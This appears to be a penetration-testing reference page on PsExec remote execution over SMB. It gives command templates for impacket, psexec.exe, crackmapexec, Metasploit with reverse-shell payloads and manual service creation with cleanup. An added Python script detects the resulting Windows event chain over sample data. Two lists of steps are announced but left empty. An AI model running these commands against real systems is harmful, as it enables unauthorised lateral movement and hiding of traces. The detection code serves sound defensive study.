PsExec (tcp/445)

PsExec is an old trick introduced by Mark Russinovich that allows remote code execution over SMB (tcp/445).


This trick requires establishing an SMB session with the target and is performed through the following steps:

Once the payload has been executed, the following steps are performed to clean up:

Because it needs to interact with the Service Control Manager, it requires administrative privileges on the target.


Impacket - psexec.py

psexec.py [DOMAIN/]<USERNAME>[:PASSWORD]@<HOST> [command]

Source: github.com/SecureAuthCorp/impacket/examples/psexec.py

SysInternals - psexec.exe

psexec.exe -nobanner -accepteula \\<HOST> -u [DOMAIN\]<USERNAME> -r [SERVICE NAME] [command]

Source: docs.microsoft.com/en-us/sysinternals/downloads/psexec

Option  Description
-d      Runs the command detached, i.e. in the background, without any interaction with stdin and stdout
-s      Runs the command with local SYSTEM privileges

crackmapexec

crackmapexec <HOST/CIDR> -u <USERNAME> -p <PASSWORD> -d <DOMAIN> --exec-method smbexec -x <CMD>

Source: github.com/byt3bl33d3r/CrackMapExec

Metasploit - exploit/windows/smb/psexec

use exploit/windows/smb/psexec
set RHOST <IP ADDRESS>
set SMBUser <USERNAME>
set SMBDomain <DOMAIN>
set SMBPass <PASSWORD>
set payload <meterpreter/reverse shell/cmd>
run -j

Source: github.com/rapid7/metasploit-framework/modules/exploits/windows/smb/psexec.rb

Manual

First, establish an SMB session with the target or start a new command prompt with NETONLY credentials:

net use \\<HOST> /user:[DOMAIN\]<USERNAME>
runas /netonly /user:[DOMAIN\]<USERNAME> cmd.exe

Then, copy the executable file to the target through the SMB session:

copy \path\to\executable \\<HOST>\ADMIN$

Then, create and start the service that will call the executable:

sc.exe \\<HOST> create <SERVICE NAME> binpath= "cmd.exe /k <\path\to\executable>"
sc.exe \\<HOST> start <SERVICE NAME>

Finally, once the payload has been executed, remove the service and the executable that was copied to the ADMIN$ share:

sc.exe \\<HOST> delete <SERVICE NAME>
del \\<HOST>\ADMIN$\<executable>
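The manual steps above (and the technique description at the top of the page) leave a recognisable chain of host artifacts: a network logon, a file written to an administrative share, and a service installed through the Service Control Manager whose binpath points at that file. The Python script below is an added example, not part of the original page and not code from any of the tools it lists; it correlates those three artifacts over constructed sample events. The field names (user, share, target, image_path, src_ip) are assumptions about how a SIEM would normalise the Windows events 4624 (logon), 5145 (detailed file share access) and 7045 (service installed); the host names, IPs, service and file names are made up for the sample.

```python
"""Correlate Windows events into the chain a PsExec-style execution leaves:
4624 type-3 logon -> 5145 write on ADMIN$/C$ -> 7045 service install whose
ImagePath runs the dropped file. Sample records are constructed, not captured."""
import re
from datetime import datetime, timedelta

# Constructed sample records (assumed SIEM field names, not real logs).
SAMPLE_EVENTS = [
    # Network logon (type 3) from the operator's machine
    {"ts": "2024-01-01T10:00:00", "id": 4624, "host": "WS01",
     "user": "CONTOSO\\jdoe", "logon_type": 3, "src_ip": "10.0.0.5"},
    # File written to the ADMIN$ share from the same source
    {"ts": "2024-01-01T10:00:02", "id": 5145, "host": "WS01",
     "user": "CONTOSO\\jdoe", "share": "\\\\*\\ADMIN$",
     "target": "svc_payload.exe", "access": "WriteData", "src_ip": "10.0.0.5"},
    # Service installed with a cmd.exe /k wrapper around the dropped file
    {"ts": "2024-01-01T10:00:04", "id": 7045, "host": "WS01",
     "user": "CONTOSO\\jdoe", "service": "UpdateSvc",
     "image_path": 'cmd.exe /k "C:\\Windows\\svc_payload.exe"'},
    # Benign: a service install with no preceding write to an admin share
    {"ts": "2024-01-01T11:00:00", "id": 7045, "host": "WS02",
     "user": "NT AUTHORITY\\SYSTEM", "service": "VendorAgent",
     "image_path": "C:\\Program Files\\Vendor\\agent.exe"},
]

ADMIN_SHARES = ("ADMIN$", "C$")


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def image_basename(image_path):
    """File name of the executable a service ImagePath actually runs.
    Unwraps 'cmd.exe /k <path>' / '/c <path>', strips quotes and arguments."""
    path = image_path.strip()
    wrapped = re.search(r"/[kc]\s+(.+)$", path)
    if wrapped:
        path = wrapped.group(1).strip()
    path = path.strip('"')
    exe = re.match(r"(.*?\.exe)\b", path, re.IGNORECASE)  # drop trailing args
    if exe:
        path = exe.group(1)
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_psexec_chains(events, window=timedelta(minutes=5)):
    """One finding per 7045 whose executable was written to ADMIN$/C$ on the
    same host within `window` beforehand; a type-3 logon from the same source
    IP in that window raises confidence from medium to high."""
    events = sorted(events, key=_ts)
    findings = []
    for svc in (e for e in events if e["id"] == 7045):
        name = image_basename(svc["image_path"])
        t_svc = _ts(svc)

        def before(e):  # event on the same host, at most `window` before 7045
            return e["host"] == svc["host"] and timedelta(0) <= t_svc - _ts(e) <= window

        drops = [e for e in events if e["id"] == 5145 and before(e)
                 and e.get("share", "").upper().endswith(ADMIN_SHARES)
                 and "WriteData" in e.get("access", "")
                 and e.get("target", "").rsplit("\\", 1)[-1].lower() == name]
        if not drops:
            continue
        drop = drops[-1]
        logons = [e for e in events if e["id"] == 4624 and before(e)
                  and e.get("logon_type") == 3
                  and e.get("src_ip") == drop.get("src_ip")]
        findings.append({
            "host": svc["host"], "service": svc["service"],
            "dropped_file": name, "src_ip": drop.get("src_ip"),
            "user": drop.get("user"),
            "confidence": "high" if logons else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_psexec_chains(SAMPLE_EVENTS):
        print(f)
```

Event 5145 is only written when "Audit Detailed File Share" is enabled, so on hosts without it the 7045 alone (a service whose ImagePath runs a freshly created file under the Windows directory, especially wrapped in cmd.exe /k) remains the signal to alert on; the script degrades to no finding rather than a false one in that case, which is the trade-off to keep in mind when tuning it.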
